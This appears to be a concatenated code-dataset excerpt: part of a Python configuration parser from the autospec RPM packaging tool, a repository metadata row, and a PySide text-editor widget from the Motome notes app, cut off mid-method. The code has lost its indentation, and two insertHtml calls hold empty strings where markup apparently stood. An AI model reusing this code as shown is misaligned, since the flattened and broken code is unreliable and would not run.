if "pypi.python.org" in url or "pypi.debian.net" in url:
self.set_build_pattern("distutils3", 10)
# cpan
if ".cpan.org/" in url or ".metacpan.org/" in url:
self.set_build_pattern("cpan", 10)
# ruby
if "rubygems.org/" in url:
self.set_build_pattern("ruby", 10)
# maven
if ".maven." in url:
self.set_build_pattern("maven", 10)
# rust crate
if "crates.io" in url:
self.set_build_pattern("cargo", 10)
# go dependency
if "proxy.golang.org" in url:
self.set_build_pattern("godep", 10)
# php modules from PECL
if "pecl.php.net" in url:
self.set_build_pattern("phpize", 10)
def add_sources(self, archives, content):
"""Add archives to sources and archive_details."""
for srcf in os.listdir(self.download_path):
if re.search(r".*\.(mount|service|socket|target|timer|path)$", srcf):
self.sources["unit"].append(srcf)
self.sources["unit"].sort()
#
# systemd-tmpfiles uses the configuration files from
# /usr/lib/tmpfiles.d/ directories to describe the creation,
# cleaning and removal of volatile and temporary files and
# directories which usually reside in directories such as
# /run or /tmp.
#
if os.path.exists(os.path.normpath(
self.download_path + "/{0}.tmpfiles".format(content.name))):
self.sources["tmpfile"].append(
"{}.tmpfiles".format(content.name))
# ditto sysusers
if os.path.exists(os.path.normpath(
self.download_path + "/{0}.sysusers".format(content.name))):
self.sources["sysuser"].append(
"{}.sysusers".format(content.name))
if content.gcov_file:
self.sources["gcov"].append(content.gcov_file)
self.sources["archive"] = archives[::2]
self.sources["destination"] = archives[1::2]
for archive, destination in zip(archives[::2], archives[1::2]):
self.archive_details[archive + "destination"] = destination
def write_config(self, config_f):
"""Write the config_f to configfile."""
with open(os.path.join(self.download_path, 'options.conf'), 'w') as configfile:
config_f.write(configfile)
def get_metadata_conf(self):
"""Gather package metadata from the content."""
metadata = {}
metadata['name'] = self.content.name
if self.urlban:
metadata['url'] = re.sub(self.urlban, "localhost", self.content.url)
metadata['archives'] = re.sub(self.urlban, "localhost", " ".join(self.content.archives))
else:
metadata['url'] = self.content.url
metadata['archives'] = " ".join(self.content.archives)
metadata['giturl'] = self.content.giturl
metadata['domain'] = self.content.domain
if self.alias:
metadata['alias'] = self.alias
else:
metadata['alias'] = ""
return metadata
def rewrite_config_opts(self):
"""Rewrite options.conf file when an option has changed (verify_required for example)."""
config_f = configparser.ConfigParser(interpolation=None, allow_no_value=True)
config_f['package'] = self.get_metadata_conf()
config_f['autospec'] = {}
# Populate missing configuration options
# (in case of a user-created options.conf)
missing = set(self.config_options.keys()).difference(set(self.config_opts.keys()))
for option in missing:
self.config_opts[option] = False
for fname, comment in sorted(self.config_options.items()):
config_f.set('autospec', '# {}'.format(comment))
config_f['autospec'][fname] = 'true' if self.config_opts[fname] else 'false'
self.write_config(config_f)
def create_conf(self):
"""Create options.conf file and use deprecated configuration files or defaults to populate."""
config_f = configparser.ConfigParser(interpolation=None, allow_no_value=True)
# first the metadata
config_f['package'] = self.get_metadata_conf()
# next the options
config_f['autospec'] = {}
for fname, comment in sorted(self.config_options.items()):
config_f.set('autospec', '# {}'.format(comment))
if os.path.exists(fname):
config_f['autospec'][fname] = 'true'
os.remove(fname)
else:
config_f['autospec'][fname] = 'false'
# default lto to true for new things
config_f['autospec']['use_lto'] = 'true'
# renamed options need special care
if os.path.exists("skip_test_suite"):
config_f['autospec']['skip_tests'] = 'true'
os.remove("skip_test_suite")
self.write_config(config_f)
def create_buildreq_cache(self, version, buildreqs_cache):
"""Make the buildreq_cache file."""
content = self.read_conf_file(os.path.join(self.download_path, "buildreq_cache"))
# don't create an empty cache file
if len(buildreqs_cache) < 1:
try:
# file was possibly added to git so we should clean it up
os.unlink(content)
except Exception:
pass
return
if not content:
pkgs = sorted(buildreqs_cache)
else:
pkgs = sorted(set(content[1:]).union(buildreqs_cache))
with open(os.path.join(self.download_path, 'buildreq_cache'), "w") as cachefile:
cachefile.write("\n".join([version] + pkgs))
self.config_files.add('buildreq_cache')
def create_versions(self, versions):
"""Make versions file."""
with open(os.path.join(self.download_path, "versions"), 'w') as vfile:
for version in versions:
vfile.write(version)
if versions[version]:
vfile.write('\t' + versions[version])
vfile.write('\n')
self.config_files.add("versions")
def read_config_opts(self):
"""Read config options from path/options.conf."""
opts_path = os.path.join(self.download_path, 'options.conf')
if not os.path.exists(opts_path):
self.create_conf()
config_f = configparser.ConfigParser(interpolation=None)
config_f.read(opts_path)
if "autospec" not in config_f.sections():
print("Missing autospec section in options.conf")
sys.exit(1)
if 'package' in config_f.sections() and config_f['package'].get('alias'):
self.alias = config_f['package']['alias']
for key in config_f['autospec']:
self.config_opts[key] = config_f['autospec'].getboolean(key)
# Rewrite the configuration file in case of formatting changes since a
# configuration file may exist without any comments (either due to an older
# version of autospec or if it was user-created)
self.rewrite_config_opts()
# Don't use the ChangeLog files if the giturl is set
# ChangeLog is just extra noise when we can already see the gitlog
if "package" in config_f.sections() and config_f['package'].get('giturl'):
keys = []
for k, v in self.transforms.items():
if v == "ChangeLog":
keys.append(k)
for k in keys:
self.transforms.pop(k)
def read_file(self, path, track=True):
"""Read full file at path.
If the file does not exist (or is not expected to exist)
in the package git repo, specify 'track=False'.
"""
try:
with open(path, "r") as f:
if track:
self.config_files.add(os.path.basename(path))
return f.readlines()
except EnvironmentError:
return []
def read_conf_file(self, path, track=True):
"""Read configuration file at path.
If the config file does not exist (or is not expected to exist)
in the package git repo, specify 'track=False'.
"""
lines = self.read_file(path, track=track)
return [line.strip() for line in lines if not line.strip().startswith("#") and line.split()]
def process_extras_file(self, fname, name, filemanager):
"""Process extras type subpackages configuration."""
content = {}
content['files'] = self.read_conf_file(os.path.join(self.download_path, fname))
req_file = os.path.join(self.download_path, f'{fname}_requires')
if os.path.isfile(req_file):
content['requires'] = self.read_conf_file(req_file)
filemanager.file_maps[name] = content
def process_requires_file(self, fname, requirements, req_type, subpkg=None):
"""Process manual subpackage requirements file."""
content = self.read_conf_file(os.path.join(self.download_path, fname))
for pkg in content:
if req_type == 'add':
requirements.add_requires(pkg, self.os_packages, override=True, subpkg=subpkg)
else:
requirements.ban_requires(pkg, subpkg=subpkg)
def read_script_file(self, path, track=True):
"""Read RPM script snippet file at path.
Returns verbatim, except for possibly the first line.
If the config file does not exist (or is not expected to exist)
in the package git repo, specify 'track=False'.
"""
lines = self.read_file(path, track=track)
if len(lines) > 0 and (lines[0].startswith('#!') or lines[0].startswith('# -*- ')):
lines = lines[1:]
# Remove any trailing whitespace and newlines. The newlines are later
# restored by writer functions.
return [line.rstrip() for line in lines]
def setup_patterns(self, path=None):
"""Read each pattern configuration file and assign to the appropriate variable."""
read_pattern_conf("ignored_commands", self.ignored_commands, list_format=True, path=path)
read_pattern_conf("failed_commands", self.failed_commands, path=path)
read_pattern_conf("maven_jars", self.maven_jars, path=path)
read_pattern_conf("gems", self.gems, path=path)
read_pattern_conf("license_hashes", self.license_hashes, path=path)
read_pattern_conf("license_translations", self.license_translations, path=path)
read_pattern_conf("license_blacklist", self.license_blacklist, list_format=True, path=path)
read_pattern_conf("qt_modules", self.qt_modules, path=path)
read_pattern_conf("cmake_modules", self.cmake_modules, path=path)
def parse_existing_spec(self, name):
"""Determine the old version, old patch list, old keyid, and cves from old spec file."""
spec = os.path.join(self.download_path, "{}.spec".format(name))
if not os.path.exists(spec):
return
found_old_version = False
found_old_patches = False
ver_regex = r"^Version *: *(.*) *$"
patch_regex = r"^Patch[0-9]* *: *(.*) *$"
# If git history exists, read the Version and Patch* spec header fields
# from the latest commit to take priority over the working copy.
cmd = ["git", "-C", self.download_path, "grep", "-E", "-h", ver_regex, "HEAD", spec]
result = subprocess.run(cmd, capture_output=True)
if result.returncode == 0:
# The first matching line is from the spec header (hopefully)
line = result.stdout.decode().split("\n")[0]
m = re.search(ver_regex, line)
if m:
self.old_version = m.group(1)
found_old_version = True
cmd = ["git", "-C", self.download_path, "grep", "-E", "-h", patch_regex, "HEAD", spec]
result = subprocess.run(cmd, capture_output=True)
if result.returncode == 0:
lines = result.stdout.decode().split("\n")
for line in lines:
m = re.search(patch_regex, line)
if m:
self.old_patches.append(m.group(1).lower())
found_old_patches = True
with open_auto(spec, "r") as inp:
for line in inp.readlines():
line = line.strip().replace("\r", "").replace("\n", "")
if "Source0 file verified with key" in line:
keyidx = line.find('0x') + 2
self.old_keyid = line[keyidx:].split()[0] if keyidx > 2 else self.old_keyid
# As a fallback, read the Version and Patch* header fields from the
# working copy of the spec, in case a git repo does not exist.
m = re.search(ver_regex, line)
if m and not found_old_version:
self.old_version = m.group(1)
found_old_version = True
m = re.search(patch_regex, line)
if m and not found_old_patches:
self.old_patches.append(m.group(1).lower())
# Ignore nopatch
for patch in self.patches:
patch = patch.lower()
if patch not in self.old_patches and patch.endswith(".patch") and patch.startswith("cve-"):
self.cves.append(patch.upper().split(".PATCH")[0])
def parse_config_versions(self):
"""Parse the versions configuration file."""
# Only actually parse it the first time around
if not self.parsed_versions:
for line in self.read_conf_file(os.path.join(self.download_path, "versions")):
# Simply whitespace-separated fields
fields = line.split()
version = fields.pop(0)
if len(fields):
url = fields.pop(0)
else:
url = ""
# Catch and report duplicate URLs in the versions file. Don't stop,
# but assume only the first one is valid and drop the rest.
if version in self.parsed_versions and url != self.parsed_versions[version]:
print_warning("Already have a URL defined for {}: {}"
.format(version, self.parsed_versions[version]))
print_warning("Dropping {}, but you should check my work"
.format(url))
else:
self.parsed_versions[version] = url
if len(fields):
print_warning("Extra fields detected in `versions` file entry:\n{}"
.format(line))
print_warning("I'll delete them, but you should check my work")
# We'll combine what we just parsed from the versions file with any other
# versions that have already been defined, most likely the version actually
# provided in the Makefile's URL variable, so we don't drop any.
for version in self.parsed_versions:
self.versions[version] = self.parsed_versions[version]
return self.versions
def write_default_conf_file(self, name, wrapper, description):
"""Write default configuration file with description to file name."""
self.config_files.add(name)
filename = os.path.join(self.download_path, name)
if os.path.isfile(filename):
return
write_out(filename, wrapper.fill(description) + "\n")
def parse_config_files(self, bump, filemanager, version, requirements):
"""Parse the various configuration files that may exist in the package directory."""
packages_file = None
# Require autospec.conf for additional features
if os.path.exists(self.config_file):
config = configparser.ConfigParser(interpolation=None)
config.read(self.config_file)
if "autospec" not in config.sections():
print("Missing autospec section..")
sys.exit(1)
self.git_uri = config['autospec'].get('git', None)
self.license_fetch = config['autospec'].get('license_fetch', None)
self.license_show = config['autospec'].get('license_show', None)
packages_file = config['autospec'].get('packages_file', None)
self.yum_conf = config['autospec'].get('yum_conf', None)
self.failed_pattern_dir = config['autospec'].get('failed_pattern_dir', None)
# support reading the local files relative to config_file
if packages_file and not os.path.isabs(packages_file):
packages_file = os.path.join(os.path.dirname(self.config_file), packages_file)
if self.yum_conf and not os.path.isabs(self.yum_conf):
self.yum_conf = os.path.join(os.path.dirname(self.config_file), self.yum_conf)
if self.failed_pattern_dir and not os.path.isabs(self.failed_pattern_dir):
self.failed_pattern_dir = os.path.join(os.path.dirname(self.config_file), self.failed_pattern_dir)
if not packages_file:
print("Warning: Set [autospec][packages_file] path to package list file for "
"requires validation")
packages_file = os.path.join(os.path.dirname(self.config_file), "packages")
self.urlban = config['autospec'].get('urlban', None)
# Read values from options.conf (and deprecated files) and rewrite as necessary
self.read_config_opts()
if not self.git_uri:
print("Warning: Set [autospec][git] upstream template for remote git URI configuration")
if not self.license_fetch:
print("Warning: Set [autospec][license_fetch] uri for license fetch support")
if not self.license_show:
print("Warning: Set [autospec][license_show] uri for license link check support")
if not self.yum_conf:
print("Warning: Set [autospec][yum_conf] path to yum.conf file for whatrequires validation")
self.yum_conf = os.path.join(os.path.dirname(self.config_file), "image-creator/yum.conf")
if packages_file:
self.os_packages = set(self.read_conf_file(packages_file, track=False))
else:
self.os_packages = set(self.read_conf_file("~/packages", track=False))
wrapper = textwrap.TextWrapper()
wrapper.initial_indent = "# "
wrapper.subsequent_indent = "# "
self.write_default_conf_file("buildreq_ban", wrapper,
"This file contains build requirements that get picked up but are "
"undesirable. One entry per line, no whitespace.")
self.write_default_conf_file("pkgconfig_ban", wrapper,
"This file contains pkgconfig build requirements that get picked up but"
" are undesirable. One entry per line, no whitespace.")
self.write_default_conf_file("requires_ban", wrapper,
"This file contains runtime requirements that get picked up but are "
"undesirable. One entry per line, no whitespace.")
self.write_default_conf_file("buildreq_add", wrapper,
"This file contains additional build requirements that did not get "
"picked up automatically. One name per line, no whitespace.")
self.write_default_conf_file("pkgconfig_add", wrapper,
"This file contains additional pkgconfig build requirements that did "
"not get picked up automatically. One name per line, no whitespace.")
self.write_default_conf_file("requires_add", wrapper,
"This file contains additional runtime requirements that did not get "
"picked up automatically. One name per line, no whitespace.")
self.write_default_conf_file("excludes", wrapper,
"This file contains the output files that need %exclude. Full path "
"names, one per line.")
content = self.read_conf_file(os.path.join(self.download_path, "release"))
if content and content[0]:
r = int(content[0])
if bump:
r += 1
self.content.release = str(r)
print("Release :", self.content.release)
content = self.read_conf_file(os.path.join(self.download_path, "extra_sources"))
for source in content:
fields = source.split(maxsplit=1)
print("Adding additional source file: %s" % fields[0])
self.config_files.add(os.path.basename(fields[0]))
self.extra_sources.append(fields)
content = self.read_conf_file(os.path.join(self.download_path, "buildreq_ban"))
for banned in content:
print("Banning build requirement: %s." % banned)
requirements.banned_buildreqs.add(banned)
requirements.buildreqs.discard(banned)
requirements.buildreqs_cache.discard(banned)
content = self.read_conf_file(os.path.join(self.download_path, "pkgconfig_ban"))
for banned in content:
banned = "pkgconfig(%s)" % banned
print("Banning build requirement: %s." % banned)
requirements.banned_buildreqs.add(banned)
requirements.buildreqs.discard(banned)
requirements.buildreqs_cache.discard(banned)
content = self.read_conf_file(os.path.join(self.download_path, "buildreq_add"))
for extra in content:
print("Adding additional build requirement: %s." % extra)
requirements.add_buildreq(extra)
cache_file = os.path.join(self.download_path, "buildreq_cache")
content = self.read_conf_file(cache_file)
if content and content[0] == version:
for extra in content[1:]:
print("Adding additional build (cache) requirement: %s." % extra)
requirements.add_buildreq(extra)
else:
try:
os.unlink(cache_file)
except FileNotFoundError:
pass
except Exception as e:
print_warning(f"Unable to remove buildreq_cache file: {e}")
content = self.read_conf_file(os.path.join(self.download_path, "pkgconfig_add"))
for extra in content:
extra = "pkgconfig(%s)" % extra
print("Adding additional build requirement: %s." % extra)
requirements.add_buildreq(extra)
# Handle dynamic configuration files (per subpackage)
for fname in os.listdir(self.download_path):
if re.search(r'.+_requires_add$', fname):
subpkg = fname[:-len("_requires_add")]
self.process_requires_file(fname, requirements, 'add', subpkg)
elif re.search(r'.+_requires_ban$', fname):
subpkg = fname[:-len("_requires_ban")]
self.process_requires_file(fname, requirements, 'ban', subpkg)
elif fname == 'requires_add':
self.process_requires_file(fname, requirements, 'add')
elif fname == 'requires_ban':
self.process_requires_file(fname, requirements, 'ban')
elif re.search(r'.+_extras$', fname):
# Prefix all but blessed names with extras-
name = fname[:-len("_extras")]
if name not in ('dev', 'tests'):
name = f'extras-{name}'
self.process_extras_file(fname, name, filemanager)
elif fname == 'extras':
self.process_extras_file(fname, fname, filemanager)
content = self.read_conf_file(os.path.join(self.download_path, "excludes"))
for exclude in content:
print("%%exclude for: %s." % exclude)
filemanager.excludes += content
content = self.read_conf_file(os.path.join(self.download_path, "setuid"))
for suid in content:
print("setuid for : %s." % suid)
filemanager.setuid += content
content = self.read_conf_file(os.path.join(self.download_path, "attrs"))
for line in content:
attr = line.split()
filename = attr.pop()
print("%attr({0},{1},{2}) for: {3}".format(
attr[0], attr[1], attr[2], filename))
filemanager.attrs[filename] = attr
self.patches += self.read_conf_file(os.path.join(self.download_path, "series"))
pfiles = [("%s/%s" % (self.download_path, x.split(" ")[0])) for x in self.patches]
cmd = "egrep \"(\+\+\+|\-\-\-).*((Makefile.am)|(aclocal.m4)|(configure.ac|configure.in))\" %s" % " ".join(pfiles) # noqa: W605
if self.patches and call(cmd,
check=False,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) == 0:
self.autoreconf = True
# Parse the version-specific patch lists
update_security_sensitive = False
for version in self.versions:
self.verpatches[version] = self.read_conf_file(os.path.join(self.download_path, '.'.join(['series', version])))
if any(p.lower().startswith('cve-') for p in self.verpatches[version]):
update_security_sensitive = True
if any(p.lower().startswith('cve-') for p in self.patches):
update_security_sensitive = True
if update_security_sensitive:
self.config_opts['security_sensitive'] = True
self.rewrite_config_opts()
content = self.read_conf_file(os.path.join(self.download_path, "configure"))
self.extra_configure = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure32"))
self.extra_configure32 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure64"))
self.extra_configure64 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure_avx2"))
self.extra_configure_avx2 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure_avx512"))
self.extra_configure_avx512 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure_openmpi"))
self.extra_configure_openmpi = " \\\n".join(content)
if self.config_opts["keepstatic"]:
self.disable_static = ""
if self.config_opts['broken_parallel_build']:
self.parallel_build = ""
content = self.read_conf_file(os.path.join(self.download_path, "make_args"))
if content:
self.extra_make = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "make32_args"))
if content:
self.extra32_make = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "make_install_args"))
if content:
self.extra_make_install = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "make32_install_args"))
if content:
self.extra_make32_install = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "install_macro"))
if content and content[0]:
self.install_macro = content[0]
content = self.read_conf_file(os.path.join(self.download_path, "cmake_args"))
if content:
self.extra_cmake = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "cmake_args_openmpi"))
if content:
self.extra_cmake_openmpi = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "cmake_srcdir"))
if content and content[0]:
self.cmake_srcdir = content[0]
content = self.read_conf_file(os.path.join(self.download_path, "subdir"))
if content and content[0]:
self.subdir = content[0]
content = self.read_conf_file(os.path.join(self.download_path, "build_pattern"))
if content and content[0]:
self.set_build_pattern(content[0], 20)
self.autoreconf = False
content = self.read_script_file(os.path.join(self.download_path, "make_check_command"))
if content:
check.tests_config = '\n'.join(content)
content = self.read_conf_file(os.path.join(self.download_path, self.content.name + ".license"))
if content and content[0]:
words = content[0].split()
for word in words:
if word.find(":") < 0:
if not license.add_license(word, self.license_translations, self.license_blacklist):
print_warning("{}: blacklisted license {} ignored.".format(self.content.name + ".license", word))
content = self.read_conf_file(os.path.join(self.download_path, "golang_libpath"))
if content and content[0]:
self.content.golibpath = content[0]
print("golibpath : {}".format(self.content.golibpath))
if self.config_opts['use_clang']:
self.config_opts['funroll-loops'] = False
requirements.add_buildreq("llvm")
if self.config_opts['32bit']:
requirements.add_buildreq("glibc-libc32")
requirements.add_buildreq("glibc-dev32")
requirements.add_buildreq("gcc-dev32")
requirements.add_buildreq("gcc-libgcc32")
requirements.add_buildreq("gcc-libstdc++32")
if self.config_opts['openmpi']:
requirements.add_buildreq("openmpi-dev")
requirements.add_buildreq("modules")
# MPI testsuites generally require "openssh"
requirements.add_buildreq("openssh")
self.prep_prepend = self.read_script_file(os.path.join(self.download_path, "prep_prepend"))
if os.path.isfile(os.path.join(self.download_path, "prep_append")):
os.rename(os.path.join(self.download_path, "prep_append"), os.path.join(self.download_path, "build_prepend"))
self.make_prepend = self.read_script_file(os.path.join(self.download_path, "make_prepend"))
self.build_prepend = self.read_script_file(os.path.join(self.download_path, "build_prepend"))
self.build_append = self.read_script_file(os.path.join(self.download_path, "build_append"))
self.install_prepend = self.read_script_file(os.path.join(self.download_path, "install_prepend"))
if os.path.isfile(os.path.join(self.download_path, "make_install_append")):
os.rename(os.path.join(self.download_path, "make_install_append"), os.path.join(self.download_path, "install_append"))
self.install_append = self.read_script_file(os.path.join(self.download_path, "install_append"))
self.service_restart = self.read_conf_file(os.path.join(self.download_path, "service_restart"))
if self.config_opts['pgo']:
self.profile_payload = self.read_script_file(os.path.join(self.download_path, "profile_payload"))
self.custom_desc = self.read_conf_file(os.path.join(self.download_path, "description"))
self.custom_summ = self.read_conf_file(os.path.join(self.download_path, "summary"))
| gpl-3.0 | 8,387,312,896,066,715,000 | 49.406561 | 139 | 0.570372 | false |
akehrer/Motome | Motome/Models/MotomeTextBrowser.py | 1 | 13660 | # Import the future
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
# Import standard library modules
import cgi
import datetime
import logging
import mimetypes
import os
import re
import shutil
# Import Qt modules
from PySide import QtCore, QtGui
# Import configuration values
from Motome.config import HIGHLIGHT_COLOR, MEDIA_FOLDER, PLATFORM
from Motome.Models.Utils import safe_filename, grab_urls
# Set up the logger
logger = logging.getLogger(__name__)
class MotomeTextBrowser(QtGui.QTextBrowser):
"""Custom QTextBrowser for the Motome application"""
noteSaved = QtCore.Signal()
def __init__(self, parent):
super(MotomeTextBrowser, self).__init__(parent)
self.parent = parent
self.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)
self.setAcceptDrops(True)
self.setReadOnly(False)
self.setAcceptRichText(False)
self.setMouseTracking(True)
self.setOpenLinks(False)
self.setOpenExternalLinks(False)
self.setUndoRedoEnabled(True)
self.setTabChangesFocus(True)
self.setFrameShape(QtGui.QFrame.NoFrame)
# save file timer
self.save_interval = 1000 # msec
self.save_timer = QtCore.QTimer()
self.save_timer.timeout.connect(self.save_note)
self.textChanged.connect(self.save_note)
self.keyboard_shortcuts = {}
self.setup_keyboard_shortcuts()
@property
def notes_dir(self):
return self.parent.current_note.notedirectory
@property
def notemodel(self):
return self.parent.current_note
def setup_keyboard_shortcuts(self):
self.keyboard_shortcuts = {'Bold': {'seq': QtGui.QKeySequence('Ctrl+B'),
'func': lambda item=None: self.process_keyseq('ctrl_b')},
'Italic': {'seq': QtGui.QKeySequence('Ctrl+I'),
'func': lambda item=None: self.process_keyseq('ctrl_i')},
'H1': {'seq': QtGui.QKeySequence('Ctrl+1'),
'func': lambda item=None: self.process_keyseq('ctrl_1')},
'H2': {'seq': QtGui.QKeySequence('Ctrl+2'),
'func': lambda item=None: self.process_keyseq('ctrl_2')},
'H3': {'seq': QtGui.QKeySequence('Ctrl+3'),
'func': lambda item=None: self.process_keyseq('ctrl_3')},
'H4': {'seq': QtGui.QKeySequence('Ctrl+4'),
'func': lambda item=None: self.process_keyseq('ctrl_4')},
'H5': {'seq': QtGui.QKeySequence('Ctrl+5'),
'func': lambda item=None: self.process_keyseq('ctrl_5')},
'H6': {'seq': QtGui.QKeySequence('Ctrl+6'),
'func': lambda item=None: self.process_keyseq('ctrl_6')},
'InsLink': {'seq': QtGui.QKeySequence('Ctrl+K'),
'func': lambda item=None: self.process_insertseq('ctrl_k')},
'InsFile': {'seq': QtGui.QKeySequence('Ctrl+Shift+K'),
'func': lambda item=None: self.process_insertseq('ctrl_shift_k')}
}
for s in self.keyboard_shortcuts.values():
QtGui.QShortcut(s['seq'], self, s['func'])
def process_keyseq(self, seq):
cursor = self.textCursor()
example = False
start_pos = 0
end_pos = 0
if not cursor.hasSelection():
cursor.select(QtGui.QTextCursor.WordUnderCursor)
text = cursor.selectedText()
if text == '':
text = 'example text'
example = True
else:
text = cursor.selectedText()
if seq == 'ctrl_b':
cursor.insertText('**{0}**'.format(text))
if example:
start_pos = cursor.selectionEnd() - len(text) - 2
end_pos = start_pos + len(text)
elif seq == 'ctrl_i':
cursor.insertText('*{0}*'.format(text))
if example:
start_pos = cursor.selectionEnd() - len(text) - 1
end_pos = start_pos + len(text)
elif seq == 'ctrl_1':
cursor.insertText('# {0}\n'.format(text))
elif seq == 'ctrl_2':
cursor.insertText('## {0}\n'.format(text))
elif seq == 'ctrl_3':
cursor.insertText('### {0}\n'.format(text))
elif seq == 'ctrl_4':
cursor.insertText('#### {0}\n'.format(text))
elif seq == 'ctrl_5':
cursor.insertText('##### {0}\n'.format(text))
elif seq == 'ctrl_6':
cursor.insertText('###### {0}\n'.format(text))
else:
logger.info('No editor code for {0}'.format(seq))
if example:
if end_pos == 0:
start_pos = cursor.selectionEnd() - len(text)
end_pos = start_pos + len(text)
cursor.setPosition(start_pos)
cursor.setPosition(end_pos, QtGui.QTextCursor.KeepAnchor)
self.setTextCursor(cursor)
def process_insertseq(self, seq):
cursor = self.textCursor()
current_pos = cursor.position()
link_title = 'Title'
link_address = 'http://www.example.com'
if not cursor.hasSelection():
cursor.select(QtGui.QTextCursor.WordUnderCursor)
text = cursor.selectedText()
if text == '':
text = 'example text'
else:
link_title = cursor.selectedText()
if seq == 'ctrl_k':
self._insert_hyperlink(title=link_title)
elif seq == 'ctrl_shift_k':
filepath, _ = QtGui.QFileDialog.getOpenFileName(self, "Select File", os.path.expanduser('~'))
if filepath != '':
self._insert_filelink(filepath)
def event(self, event):
if (event.type() == QtCore.QEvent.KeyPress) and (event.key() == QtCore.Qt.Key_Tab):
self.insertHtml(' ')
return True
return QtGui.QTextBrowser.event(self, event)
def set_note_text(self, content=None):
try:
if content is not None:
text = cgi.escape(content)
else:
text = cgi.escape(self.notemodel.content)
text = text.replace(' ', ' ')
link_pattern = r'\[([^\[]+)\]\(([^\)]+)\)'
link_transform = r'[\1](<a href="\2">\2</a>)'
linked_content = re.sub(link_pattern, link_transform, text)
intralink_pattern = r'\[\[([^\[]+)\]\]'
intralink_transform = r'[[<a href="\1">\1</a>]]'
intralink_content = re.sub(intralink_pattern, intralink_transform, linked_content)
self.setHtml(intralink_content.replace('\n', '<br />'))
self.setDocumentTitle(self.notemodel.title) # for things like print to pdf
except AttributeError:
self.setHtml('')
def canInsertFromMimeData(self, source):
""" Capture pastes of files
http://stackoverflow.com/questions/15592581/pasting-qmimedata-to-another-windows-qtextedit
:param source:
:return:
"""
if source.hasImage():
return True
elif source.hasUrls():
return True
else:
return super(MotomeTextBrowser, self).canInsertFromMimeData(source)
def insertFromMimeData(self, source):
""" Capture pastes of files
http://stackoverflow.com/questions/15592581/pasting-qmimedata-to-another-windows-qtextedit
:param source:
:return:
"""
if source.hasImage():
image = source.imageData()
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
imagepath = os.path.join(self.notes_dir, MEDIA_FOLDER, now + '.png')
image.save(imagepath)
self._insert_filelink(imagepath)
elif source.hasUrls():
urls = source.urls()
self._insert_list_of_files(urls)
super(MotomeTextBrowser, self).insertFromMimeData(source)
def dragEnterEvent(self, e):
"""
Need to accept drag enter events
"""
e.accept()
def dropEvent(self, e):
"""
http://qt-project.org/wiki/Drag_and_Drop_of_files
"""
# dropped files are file:// urls
if e.mimeData().hasUrls():
self._insert_list_of_files(e.mimeData().urls())
def dragMoveEvent(self, e):
"""
Need to accept drag move events
http://qt-project.org/forums/viewthread/3093
"""
e.accept()
def start_save(self):
if self.save_timer.isActive():
self.save_timer.stop()
self.save_timer.start(self.save_interval)
def save_note(self):
if self.notemodel is None:
return
if self.save_timer.isActive():
self.save_timer.stop()
content = self.toPlainText()
self.notemodel.content = content
self.noteSaved.emit()
def highlight_search(self, query):
"""
Highlight all the search terms
http://www.qtcentre.org/threads/27005-QTextEdit-find-all
"""
current_cursor = self.textCursor()
extra_selections = []
for term in query:
self.moveCursor(QtGui.QTextCursor.Start)
while self.find(term):
extra = QtGui.QTextEdit.ExtraSelection()
extra.format.setBackground(HIGHLIGHT_COLOR)
extra.cursor = self.textCursor()
extra_selections.append(extra)
self.setExtraSelections(extra_selections)
self.setTextCursor(current_cursor)
def get_note_links(self):
# url_re_compile = re.compile(r'\[([^\[]+)\]\(([^\)]+)\)', re.VERBOSE | re.MULTILINE)
# return url_re_compile.findall(self.toPlainText())
return self.notemodel.urls
def _insert_list_of_files(self, file_list):
for filepath in file_list:
if filepath.isLocalFile():
if 'win32' in PLATFORM:
# mimedata path includes a leading slash that confuses copyfile on windows
# http://stackoverflow.com/questions/2144748/is-it-safe-to-use-sys-platform-win32-check-on-64-bit-python
fpath = filepath.path()[1:]
else:
# not windows
fpath = filepath.path()
self._insert_filelink(fpath)
def _insert_hyperlink(self, title=None):
cursor = self.textCursor()
current_pos = cursor.position()
if title is not None:
link_title = title
else:
link_title = 'Link Title'
link_address = 'http://www.example.com'
start_pos = current_pos + 1
end_pos = start_pos + len(link_title)
clipboard_text = QtGui.QClipboard().text()
if len(grab_urls(clipboard_text)) > 0:
link_address = clipboard_text
text, ret = QtGui.QInputDialog.getText(self, 'Insert Link', 'Link address:', QtGui.QLineEdit.Normal,
link_address)
if cursor.hasSelection():
start_pos = cursor.selectionEnd() + 3
end_pos = start_pos + len(link_address)
if ret:
if text != '':
link_address = text
cursor.insertHtml('[{0}](<a href="{1}">{1}</a>)'.format(link_title, link_address))
cursor.setPosition(start_pos)
cursor.setPosition(end_pos, QtGui.QTextCursor.KeepAnchor)
self.setTextCursor(cursor)
def _insert_filelink(self, filepath):
# create the media storage directory
try:
html_dir = os.path.join(self.notes_dir, MEDIA_FOLDER)
os.makedirs(html_dir)
except OSError:
# already there
pass
except AttributeError:
# notemodel is None
return
cursor = self.textCursor()
current_pos = cursor.position()
filename = safe_filename(os.path.basename(filepath))
dst_path = os.path.join(self.notes_dir, MEDIA_FOLDER, filename)
link_address = './{0}/{1}'.format(MEDIA_FOLDER, filename)
if cursor.hasSelection():
link_title = cursor.selectedText()
else:
link_title = filename
try:
is_image = 'image' in mimetypes.guess_type(filepath)[0]
except TypeError:
is_image = False
if is_image:
# user sent an image file
try:
shutil.copyfile(filepath, dst_path)
except (IOError, shutil.Error):
# file probably already there
pass
self.insertHtml(''.format(link_title, link_address))
else:
try:
shutil.copyfile(filepath, dst_path)
except (IOError, shutil.Error):
# file probably already there
pass
